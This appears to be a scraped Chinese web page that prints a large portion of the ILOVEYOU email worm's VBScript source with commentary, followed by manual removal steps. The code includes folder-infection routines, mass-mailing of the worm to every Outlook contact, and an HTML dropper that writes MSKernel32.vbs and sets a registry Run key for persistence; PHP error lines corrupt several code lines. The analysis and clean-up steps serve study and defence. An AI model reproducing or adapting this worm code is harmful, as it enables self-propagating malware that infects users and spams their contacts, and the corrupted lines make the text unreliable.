“i love you”病毒原理 .txt

病毒源码 包括世上第一个病毒源码、蠕虫源码、冲击波源码

' 遍历文件夹 
On Error Resume Next 
dim f,f1,sf 
set f = fso.GetFolder(folderspec) 
set sf = f.SubFolders 
for each f1 in sf 
infectfiles(f1.path) 
folderlist(f1.path) 
next 
end sub 
sub regcreate(regkey,regvalue) 
' 修改注册表（创建键值） 
' 这个程序似乎是微软的示范程序。 
Set regedit = CreateObject("WScript.Shell") 
regedit.RegWrite regkey,regvalue 
end sub  
function regget(value) 
' 这个程序似乎也是微软的示范程序。(WSH示范，在Windows文件夹) 
Set regedit = CreateObject("WScript.Shell") 
regget=regedit.RegRead(value) 
end function 
function fileexist(filespec) 
' 判断文件是否存在 
' 纯粹从技术角度讲，这段程序写的不怎么样。 
' 不用写这么长就能够实现相同的功能 
On Error Resume Next 
dim msg 
if (fso.FileExists(filespec)) Then 
msg = 0 
else 
msg = 1 
end if 
fileexist = msg 
end function 
function folderexist(folderspec) 
' 判断文件夹是否存在 
' 和上一段程序一样臭。 
On Error Resume Next 
dim msg 
if (fso.GetFolderExists(folderspec)) then 
msg = 0 
else 
msg = 1 
end if 
fileexist = msg 
end function 
sub spreadtoemail() 
' 通过电子邮件扩散 
On Error Resume Next 
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad 
set regedit=CreateObject("WScript.Shell") 
set out=WScript.CreateObject("Outlook.Application") 
' 病毒的局限：只支持Outlook，而Outlook Express则不支持。 
set mapi=out.GetNameSpace("MAPI") 
for ctrlists=1 to mapi.AddressLists.Count 
set a=mapi.AddressLists(ctrlists) 
x=1 
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a) 
if (regv="") then 
regv=1 
end if 
if (int(a.AddressEntries.Count)>int(regv)) then 
for ctrentries=1 to a.AddressEntries.Count 
malead=a.AddressEntries(x) 
regad="" 
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male 
ad) 
if (regad="") then 
set male=out.CreateItem(0) 
male.Recipients.Add(malead) 
male.Subject = "ILOVEYOU" 
' 病毒得名的原因 
' 见到这样的邮件，肯定是病毒。 
' 头脑正常的人恐怕不会这样直白的。 
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from m 
e." 
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") 
male.Send 
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1, 
"REG_DWORD" 
end if 
x=x+1 
next 
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre 
ssEntries.Count 
else 
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.Addre 
ssEntries.Count 
end if 
next 
Set out=Nothing 
Set mapi=Nothing 
end sub 
sub html 
' 从技术角度说，这段程序写得很漂亮，原因在于充分地利用了 Outlook 的资源 
。 
' 值得编写程序的借鉴。 
' 程序中间的_符号是连接线，所以注释写在这里。 
' 程序中无效语句很多，浪费了不少空间。 
On Error Resume Next 
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6 
dta1="<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META NAME=@-@Gene  
rator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& _ 
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-? @G  
RAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& _ 

"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is go  
od...@-@>"&vbcrlf& _ 
"<?-?HEAD><BODY ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LO 
VE-LETTER-FOR-YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _ 
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YO 
U.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@ 
>"&vbcrlf& _  
"<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to r 
ead this HTML file<BR>- Please press #-#YES#-# button to Enable Active 
X<?-?p>"&vbcrlf& _  
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@ BGCOLOR=@-@yellow@-@>-------- 
--z--------------------z----------<?-?MARQUEE> "&vbcrlf& _  
"<?-?BODY><?-?HTML>"&vbcrlf& _  
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _  
"<!--?-??-?"&vbcrlf& _  
"if (window.screen){var wi=screen.availWidth;var hi=screen.availHeight 
;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbcrlf& _  
"?-??-?-->"&vbcrlf& _  
"<?-?SCRIPT>"&vbcrlf& _  
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _  
"<!--"&vbcrlf& _  
"on error resume next"&vbcrlf& _  
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _  
"aw=1"&vbcrlf& _  
"code="  
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf&  
_  
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _  
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _  
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _  
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _  
"set wri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf  
& _  
"wri.write code4"&vbcrlf& _  
"wri.close"&vbcrlf& _  
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf&  
_  
"if (err.number=424) then"&vbcrlf& _  
"aw=0"&vbcrlf& _  
"end if"&vbcrlf& _  
"if (aw=1) then"&vbcrlf& _  
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _  
"window.close"&vbcrlf& _  
"end if"&vbcrlf& _  
"end if"&vbcrlf& _  
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _  
"regedit.RegWrite @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windo 
ws^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.v 
bs@-@"&vbcrlf& _  
"?-??-?-->"&vbcrlf& _  
"<?-?SCRIPT>"  
dt1=replace(dta1,chr(35)&chr(45)&chr(35),"'")  
dt1=replace(dt1,chr(64)&chr(45)&chr(64),"""")  
dt4=replace(dt1,chr(63)&chr(45)&chr(63),"/")  
dt5=replace(dt4,chr(94)&chr(45)&chr(94),"\") 
dt2=replace(dta2,chr(35)&chr(45)&chr(35),"'") 
dt2=replace(dt2,chr(64)&chr(45)&chr(64),"""") 
dt3=replace(dt2,chr(63)&chr(45)&chr(63),"/") 
dt6=replace(dt3,chr(94)&chr(45)&chr(94),"\") 
set fso=CreateObject("Scripting.FileSystemObject") 
set c=fso.OpenTextFile(WScript.ScriptFullName,1) 
lines=Split(c.ReadAll,vbcrlf) 
l1=ubound(lines) 
for n=0 to ubound(lines) 
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91)) 
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93)) 
lines(n)=replace(lines(n),"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
",chr(37)+chr(45)+chr(37)) 
if (l1=n) then 
lines(n)=chr(34)+lines(n)+chr(34) 
else 
lines(n)=chr(34)+lines(n)+chr(34)&"&vbcrlf& _" 
end if 
next 
set b=fso.CreateTextFile(dirsystem+"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
LOVE-LETTER-FOR-YOU.HTM") 
b.close 
set d=fso.OpenTextFile(dirsystem+"
Warning: Unexpected character in input: '\' (ASCII=92) state=1 in /z1/shanguo/public_html/soudu/read_article.php on line 131
LOVE-LETTER-FOR-YOU.HTM",2) 
d.write dt5  
d.write join(lines,vbcrlf) 
d.write vbcrlf  
d.write dt6  
d.close  
end sub  


“I LOVE YOU”病毒的解毒步骤  
1、如你的电脑感染该病毒，请在windwos下按CTRL+ALT+DEL查看内存中是否有ws  
cript这个文件，如有，你已感染。请点击该文件，并将该文件“结束任务”。  

2、请进入c:\windows\system中，运行MSCONFIG.EXE进入“启动”菜单，将所有  
的后缀为*.vbs的文件选择为禁用状态。  
3、“确定”后重新启动电脑。（切记：需保证内存中无wscript这个文件，才可  
关闭）  
4、删除含LOVE-LETTER-FOR-YOU.TXT附件的mail. 
5、病毒杀除，但尸体留在您的电脑中了 :-) 


by quack  
　　参考：Analysis of the LOVE-LETTER-FOR-YOU virus/worm